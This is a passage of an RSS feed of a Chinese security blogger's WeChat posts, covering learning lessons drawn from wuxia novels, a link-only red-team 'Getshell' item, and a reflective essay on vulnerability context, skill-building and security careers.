张三丰传给他的乃是“剑意”，而非“剑招”，要他将所见到的剑招忘得半点不剩，才能得其神髓，临敌时以意驭剑，千变万化，无穷无尽。若有一两招剑法忘不干净，心有拘囿，剑法便不能纯。面对新知我们习惯性的用经验去判断去推理，但有时候的确需要<span style="color: rgb(255, 0, 0);"><strong>空杯心态</strong></span>。除了技能，角色转变也是如此（慕容博参禅后说：“庶民如尘土，帝王亦如尘土”），现实中的人们、公司带着各种标签、包袱前行，可能会更累。</p><p><br/></p><p><span style="font-size: 24px;">4. 独孤求败</span><br/></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.6246200607902735" data-s="300,640" style="" data-type="jpeg" data-w="658" src="https://wechat2rss.xlab.app/img-proxy/?k=fcb694eb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIngJaZECgia1JUfh7ia0kfAFBmMe2Z7qvWVWjdEu5YjfHylFpsxjoR0sNnDp2UIibpqSERQKXae5Y0w%2F640%3Fwx_fmt%3Djpeg"/></p><p><span style="font-size: 24px;"></span></p><p><span style="font-size: 15px;"><em>        杨过提起右首第一柄剑，见剑下的石上刻有两行小字：“凌厉刚猛，无坚不摧，弱冠前以之与河朔群雄争锋。”</em></span></p><p><span style="font-size: 15px;"><em>　　再看那剑时，见长约四尺，青光闪闪，的是利器。他将剑放回原处，拿起长条石片，见石片下的青石上也刻有两行小字：“紫薇软剑，三十岁前所用，误伤义士不祥，悔恨无已，乃弃之深谷。”</em></span></p><p><span style="font-size: 15px;"><em>　　杨过心想：“这里少了一把剑，原来是给他抛弃了，不知如何误伤义士，这故事多半永远无人知晓了。”出了一会神，再伸手去拿第二柄剑，只提起数尺，呛啷一声，竟然脱手掉下，在石上一碰，火花四溅，不禁吓了一跳。</em></span></p><p><span style="font-size: 15px;"><em>　　原来那剑黑黝黝的毫无异状，却沉重之极，三尺多长一把剑，重量竟自不下七八十斤，比之战阵上最沉重的金刀大戟尤重数倍。杨过提起时如何想得到，出乎不意的手上一沉，便拿捏不住。再俯身拿起，这次有了防备，拿起七八十斤的重物自不当一回事。见那剑两边剑锋都是钝口，剑尖更圆圆的似是个半球，心想：“此剑如此沉重，又怎能使得灵便？何况剑尖剑锋都不开口，倒似是我们古墓派的无尖无锋剑。”看剑下的石刻，见两行小字道：“重剑无锋，大巧不工。四十岁前恃之横行天下。”</em></span></p><p><span style="font-size: 15px;"><em>　　杨过喃喃念着“<span style="color: rgb(223, 64, 42);">重剑无锋，大巧不工</span>”八字，心中似有所悟，但想世间剑术，不论那一门那一派的变化如何不同，总以轻灵迅疾为尚，古墓派玉女剑法尤重轻巧，这柄重剑却与常理相反，想怀昔贤，不禁神驰久之。</em></span></p><p><span style="font-size: 15px;"><em>　　过了良久，才放下重剑，去取第三柄剑，这一次又上了个当。他只道这剑定然犹重前剑，因此提剑时力运左臂。那知拿在手里却轻飘飘的浑似无物，凝神一看，原来是柄木剑，年深日久，剑身剑柄均已腐朽，剑下的石刻道：“四十岁后，不滞于物，草木竹石均可为剑。自此精修，渐进于无剑胜有剑之境。”</em></span></p><p><span style="font-size: 15px;"><em>　　他将木剑恭恭敬敬的放于原处，浩然长叹，说道：“前辈神技，令人难以想象。”心想青石板之下不知是否留有剑谱之类遗物，伸手抓住石板，向上掀起，见石板下已是山壁的坚岩，别无他物，不由得微感失望。</em></span></p><p><br/></p><p>利剑、紫薇软剑、玄铁重剑、木剑、无剑，也代表现实的一种<strong><span style="color: rgb(255, 0, 0);">填坑能力</span></strong>。</p><p>参考六神磊磊 的 <a target="_blank" href="https://mp.weixin.qq.com/s?__biz=MzA4NDEzNTMyMA==&amp;mid=2650320203&amp;idx=1&amp;sn=27f441c6205d644457c6240ccdd551ff&amp;scene=21#wechat_redirect" textvalue="孤独求败的四把剑，藏了一个很雕的做人道理" tab="innerlink" data-linktype="2">孤独求败的四把剑，藏了一个很雕的做人道理</a></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.65" data-s="300,640" style="" data-type="jpeg" data-w="640" src="https://wechat2rss.xlab.app/img-proxy/?k=1adcabe3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIngJaZECgia1JUfh7ia0kfAFYLOajEx1O10PTfoqxsL8OaANicGz0bIJgpfs7yibOY8I4vEN0WUo2icBw%2F640%3Fwx_fmt%3Djpeg"/></p><p><br/></p><p><span style="font-size: 24px;">5. 马钰道长</span></p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-ratio="0.7440677966101695" data-s="300,640" style="" data-type="jpeg" data-w="590" src="https://wechat2rss.xlab.app/img-proxy/?k=13c8b3a5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIngJaZECgia1JUfh7ia0kfAFP8g7IKjrATicpNq5FYX5hvec1fpFWTj0g2uIBsQBOMibv9CpaJxw8hQg%2F640%3Fwx_fmt%3Djpeg"/></p><p><span style="font-size: 24px;"></span></p><p><span style="font-size: 15px;"><em>       那道人道：“你把那块大石上的积雪除掉，就在上面睡吧。”郭靖更是奇怪。依言拨去积雪，横卧在大石之上。那道人道：“这样睡觉，何必要我教你？我有四句话，你要牢牢记住：<span style="color: rgb(223, 64, 42);">思定则情忘，体虚则气运，心死则神活，阳盛则阴消。</span>”郭靖念了几遍，记在心中，但不知是什么意思。</em></span></p><p><span style="font-size: 15px;"><em>　　那道人道：“睡觉之前，必须脑中空明澄澈，没一丝思虑。然后敛身侧卧，鼻息绵绵，魂不内荡，神不外游。”于是传授了呼吸运气之法、静坐敛虑之术。</em></span></p><p><span style="font-size: 15px;"><em>　　郭靖依言试行，起初思潮起伏，难以归摄，但依着那道人所授缓吐深纳的呼吸方法做去，良久良久，渐感心定，丹田中却有一股气渐渐暖将上来，崖顶上寒风刺骨，也已不觉如何难以抵挡。这般静卧了约莫一个时辰，手足忽感酸麻，那道人坐在他对面打坐，睁开眼道：“现下可以睡着了。”郭靖依言睡去，一觉醒来，东方已然微明。那道人用长索将他缒了下去，命他当晚再来，一再叮嘱他不可对任何人提及此事。</em></span></p><p>      思定则情忘，体虚则气运，心死则神活，阳盛则阴消，出自《丹阳修真语录》。<span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">马钰道长传给郭靖的是<strong>呼吸、坐下、行路、睡觉</strong>的法子，后期根据效果还是实用的。大致目标意思是：睡觉之前，必须脑中孔明清澈，没一丝思虑；然后敛身侧卧，鼻息绵绵，魂不内荡，神不外游。当然这一套对于现在的我们还是比较实际，可以快速落地并收益，自行拓展，百度搜索“吐纳”。</span></p><p><br/></p><p><span style="font-size: 24px;">6. 其他</span></p><p>      周伯通的“专气致柔,能如婴儿乎”，老顽童创作了左右互搏术（据说聪明人学不来），所以要适配个人特点，装聪明容易，装傻还是需要高度；</p><p>     《九阴真经》的天之道，损有余而补不足；人之道，损不足而奉有余。也符合自然平衡以及<strong><span style="color: rgb(255, 0, 0);">马太效应</span></strong>相结合。平衡态还是很关键观点，好多场景觉得不公平，但把时间拉长看几代人，基本上还是相对公平的。所以对于学习这件事，仍是<span style="color: rgb(255, 0, 0);"><strong>时间复利</strong></span>。</p><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-backh="914" data-backw="578" data-ratio="1.581291759465479" data-s="300,640" style="width: 100%;height: auto;" data-type="jpeg" data-w="898" src="https://wechat2rss.xlab.app/img-proxy/?k=07d37270&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIngJaZECgia1JUfh7ia0kfAFRAuMrqN8K7pdE1yYE5GOhACrNOjhKcpJXtSaXenwocyAK94xUNiaucg%2F640%3Fwx_fmt%3Djpeg"/></p><p><br/></p><p>      以上是武学大家的治学“心法”，我辈还要参考借鉴后，结合<span style="font-family: mp-quote, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;">第八套广播体操一起练，应该很快打通任督二脉了，23333</span></p><p><br/></p><p><img class="rich_pages js_insertlocalimg" data-ratio="0.8673076923076923" data-s="300,640" style="text-align: center;white-space: normal;" data-type="jpeg" data-w="1040" src="https://wechat2rss.xlab.app/img-proxy/?k=06cd6843&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtIngJaZECgia1JUfh7ia0kfAFPWb8cp2MqpZpwSruTqFbntlHCbibpZKjdmYPdAjeV8X0UsJaV3VdIUg%2F640%3Fwx_fmt%3Djpeg"/></p>



<p><a href="2247483773">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=fe1600ac&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247483773%26idx%3D1%26sn%3Df0aee3d86bc5e0a2b3866fe93be223e2%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sat, 27 Jun 2020 16:08:00 +0800</pubDate>
    </item>
    <item>
      <title>红队-Getshell思路总结</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483759&amp;idx=1&amp;sn=ac361f47d2e3d40f34f77fd59698078b</link>
      <description>红队-Getshell思路总结</description>
      <content:encoded><![CDATA[<p>
<span>sm0nk</span> <span>2020-04-07 11:13</span> <span style="display: inline-block;"></span>
</p>

<p>红队-Getshell思路总结</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=5c41962a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtJTAk2N1YJ7PfhZH0QrUK0gOtNtVwywR4ibsyyEz6Ql2kETnQz10J4aaEu03oLMZA9WxlJ209JicD3g%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="display: none;" data-tools="新媒体管家" data-label="powered by xmt.cn"><br/></section><p><br/></p><p>原文首发先知 ,点击阅读原文即可。</p><p><a href="https://xz.aliyun.com/t/7500" target="_blank">https://xz.aliyun.com/t/7500</a></p><p><br/></p><p style="text-align: center;"><img class="rich_pages" data-ratio="0.3849246231155779" data-s="300,640" style="" data-type="png" data-w="1990" src="https://wechat2rss.xlab.app/img-proxy/?k=cf32f3d9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtJTAk2N1YJ7PfhZH0QrUK0go19voAm57AgtBCB1Q59vmzbGtEJE31dibIt8Fq5HDI74iaryvJDyhQbQ%2F640%3Fwx_fmt%3Dpng"/></p><p><br/></p>



<p><a href="https://xz.aliyun.com/t/7500">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=85bda93a&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247483759%26idx%3D1%26sn%3Dac361f47d2e3d40f34f77fd59698078b%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Tue, 07 Apr 2020 11:13:00 +0800</pubDate>
    </item>
    <item>
      <title>应用场景VS渗透攻防</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0NTI4MDQwMQ==&amp;mid=2247483751&amp;idx=1&amp;sn=eebc645e4a3741a73c0c62ef197dc6ba</link>
      <description>Web渗透（独孤九剑）；代码审计&amp;安全开发（降龙十八掌）；二进制&amp;逆向（易筋经）；咨询规划系（小无相功）</description>
      <content:encoded><![CDATA[<p>
原创 <span>程小远</span> <span>2020-04-05 23:59</span> <span style="display: inline-block;"></span>
</p>

<p>Web渗透（独孤九剑）；代码审计&安全开发（降龙十八掌）；二进制&逆向（易筋经）；咨询规划系（小无相功）</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=7773aabc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FgS0DP6tuCtLUwpN9F8FD050Qakibd3x1MlBv8YS8tPOa0XjDdhdOLZtvEhe5rQgcyLJ9JErfEDXVpRwgPWcAZMw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;text-indent: 28px;line-height: 2em;"><span style="font-size: 18px;">从一句《金刚经》开始，“无我相。</span><span style="font-size: 18px;">无人相。</span><span style="font-size: 18px;">无众生相。</span><span style="font-size: 18px;">无寿者相”，如果直接去理</span><span style="font-size: 18px;">解</span><span style="font-size: 18px;">这</span><span style="font-size: 18px;">句话，还</span><span style="font-size: 18px;">是比较艰涩的，但放在倚天的金毛狮王谢逊在少林寺地牢时念的就是</span><span style="font-size: 18px;">这段，大概</span><span style="font-size: 18px;">能理解当时的那种超脱和无所谓的心态。</span><span style="font-size: 18px;">这算是一种应用场景，最起码能更好的理解。</span><br/></p><p style="text-align: center;"><img class="rich_pages" data-backh="305" data-backw="415" data-ratio="0.7349397590361446" data-s="300,640" style="width: 100%;height: auto;" data-type="png" data-w="415" src="https://wechat2rss.xlab.app/img-proxy/?k=b331b469&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLUwpN9F8FD050Qakibd3x1M878nvg9mZib5D14rxFaUXxDDEnqOcPia3Eiccib3t34aqj7m85WJjkXIQw%2F640%3Fwx_fmt%3Dpng"/></p><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;text-indent: 28px;line-height: 2em;"><span style="font-size: 18px;"></span></section><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;line-height: 2em;"><span style="font-size: 18px;">       再看一个具体漏洞实例，我们耳熟能详的弱口令，最常见不过，但如果这个123456弱口令是在某卫星或某情报部门，这个利用价值就非常大。这也是一种应用场景。单独一个维度看漏洞定义可能价值不大，但作用在某个场景下，结果往往惊喜和意外。例如“利用几个信息泄露漏洞组合Getshell”，实属洞不在小，能shell则灵。这个漏洞还是那个漏洞，但效果却不是那个效果，应用场景至关重要（资产的价值）。</span></section><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;line-height: 2em;"><span style="font-size: 18px;"><br/></span></section><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;line-height: 2em;"><span style="font-size: 18px;">       提及渗透攻防，大家都知道，这个技能的段位和兴趣以及学习密切相关。兴趣真的很重要，决定了个人的阶段小目标达成后深入的程度（<em>因为真喜欢是真坚持，初心如此，夜深人静，漏洞分析越分析越精神，都额外付出了这么多，再没结果的确不是很友好哈</em>）；学习主要是学习能力（学习的目的是学习（能力），而不是学习（课本））这个还是很艺术，包括学什么、怎么学、学习效果等。有的可能第一步学什么就错了，甚至大错特错。（当然错也不一定是坏事，因为有时候错错就是对），从单元时间来看，学错了就意味着价值最小化。比如学了的知识一直没有应用场景，就等于压箱底的技能。除非大毅力等或找应用场景，否则随着时间就慢慢忘记了。学习效果最终通过价值/产出来校验(引用“古典”老师的一个术语——知识IPO：以提出问题为驱动、以解决问题为整合、用输出倒逼输入产品化)。</span></section><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;line-height: 2em;"><span style="font-size: 18px;"><br/></span></section><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;text-indent: 28px;line-height: 2em;"><span style="font-size: 18px;">成年人的学习大多跟应用场景有关，不在实战中锻造，终觉浅。我们来看一下下面这个技能脑图，技术相关分门别类还是挺多的。对于学习来讲， 学会还是很容易的，但学好的确还是有难度，任何一个分支，研究的非常深入，除了学习 最终都要有自己的一套异于常人的体系方法。无论是甲方场景还是乙方场景，这些技能中的确是Web渗透和内网渗透技能场景更容易入门（最起码见效比较快），随着时间的推移，深度逐渐跟审计、工程开发结合起来，逐渐变为内功；二进制属于另一个层次内功，需要稳住才能赢。例如红蓝对抗，靠刷几个漏洞和内网组合就对抗了、就APT了，还是不太合适。因为需要大量的实战来喂养（正所谓以战养战）。这个实战就是应用场景，比如每天的工作是漏洞审核，但目标是整个攻击链，这个工作场景就暂时不适合你这个目标的达成。</span></section><p style="text-align: center;"><img class="rich_pages js_insertlocalimg" data-backh="456" data-backw="578" data-ratio="0.78828125" data-s="300,640" style="width: 100%;height: auto;" data-type="png" data-w="1280" src="https://wechat2rss.xlab.app/img-proxy/?k=805cb925&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FgS0DP6tuCtLUwpN9F8FD050Qakibd3x1MNnpNv1SUDEErvfsC696qP6nGvAfgoKqC0pPfXhjxQ7LNzWbeEJ5VHg%2F640%3Fwx_fmt%3Dpng"/></p><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;text-indent: 28px;line-height: 2em;"><span style="font-size: 18px;"></span></section><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;text-indent: 28px;line-height: 2em;"><span style="font-size: 18px;">这两年HW的成熟，相当于把知识面给串起来了，多个维度都得到深度的挖掘和利用。试想，之前的内网渗透除了几个互联网大厂、黑灰产&amp;对抗、需求特定方 做的相对深入，普通的乙方安全服务，是不能随便动内网的，想动客户也不让动。现在动辄0day、Getshell、内网漫游、核心被控，仿佛说说名词就长高10公分似的。这也算是应用场景带动。</span></section><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;text-indent: 28px;line-height: 2em;"><span style="font-size: 18px;"><br/></span></section><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;text-indent: 28px;line-height: 2em;"><span style="font-size: 18px;">再谈下价值，其实上面的技能列表，跟我们的工作技能息息相关。之前因为攻防相关的岗位也少、学习的渠道也少，所以好多野路子，并且得到大家的认可。随着行业的发展，每个分支会更细化，（比如代码审计的java安全，不用全都会，一门研究的很深入，结果也可理想。）同样也会逐渐标准化，同样可能会苦行僧般的修行。当然越向上越需要这样的精神。毕竟价值和产出在衡量。即使在甲方工作若干年后选择创业，依然会考虑产品和服务，产品解决的什么场景的痛点。服务在什么场景下比其他厂家更有优势。即使不选择创业，仍然有个35岁坑位等着来填。这个坑跟管理和技术关系不大，跟价值产出与实现有关。所以有个神奇的逻辑叫做都是局部真相（包括我这句）。</span></section><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;text-indent: 28px;line-height: 2em;"><span style="font-size: 18px;"><br/></span></section><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;text-indent: 28px;line-height: 2em;"><span style="font-size: 18px;">在武侠世界的武功、现在技术圈的技能以及现在社会的金钱都是一种度量衡。有几个挺有意思的比喻，自行把握参考。</span></section><ol class="list-paddingleft-2" style="list-style-type: decimal;"><li><p><span style="font-size: 18px;">Web渗透（<em>独孤九剑</em>）</span></p></li><li><p><span style="font-size: 18px;">代码审计&amp;安全开发（<em>降龙十八掌</em>）</span></p></li><li><p><span style="font-size: 18px;">二进制&amp;逆向（<em>易筋经</em>）</span></p></li><li><p><span style="font-size: 18px;">咨询规划系（<em>小无相功</em>） --&gt; PPT最好编程语言？</span></p></li><li><p><span style="font-size: 18px;">不管什么场景，都是填坑能力的升级，参考sixgod </span><a href="https://mp.weixin.qq.com/s?__biz=MzA4NDEzNTMyMA==&amp;mid=2650320203&amp;idx=1&amp;sn=27f441c6205d644457c6240ccdd551ff&amp;scene=21#wechat_redirect" style="color: rgb(149, 79, 114);font-size: 18px;" data-linktype="2"><span style="font-size: 18px;">独孤求败四把剑</span></a></p></li></ol><section style="line-height: 2em;"><br/></section><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;text-indent: 28px;line-height: 2em;"><span style="font-size: 18px;"></span></section><section style="font-size: 14px;font-family: DengXian;color: rgb(0, 0, 0);white-space: normal;text-indent: 28px;line-height: 2em;"><span style="font-size: 18px;">这本来是在年会时候的一个分享，算是朝花夕拾系列吧。愿各位早日实现疲惫中的英雄梦想。（<em>有些观点可能不一定正确，但无所谓，因为喜欢与不喜欢都在那里，2333，本文原创于程远的《一本正经的胡说八道》</em>）</span></section>



<p><a href="2247483751">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=7549642e&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0NTI4MDQwMQ%3D%3D%26mid%3D2247483751%26idx%3D1%26sn%3Deebc645e4a3741a73c0c62ef197dc6ba%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Sun, 05 Apr 2020 23:59:00 +0800</pubDate>
    </item>
  </channel>
</rss>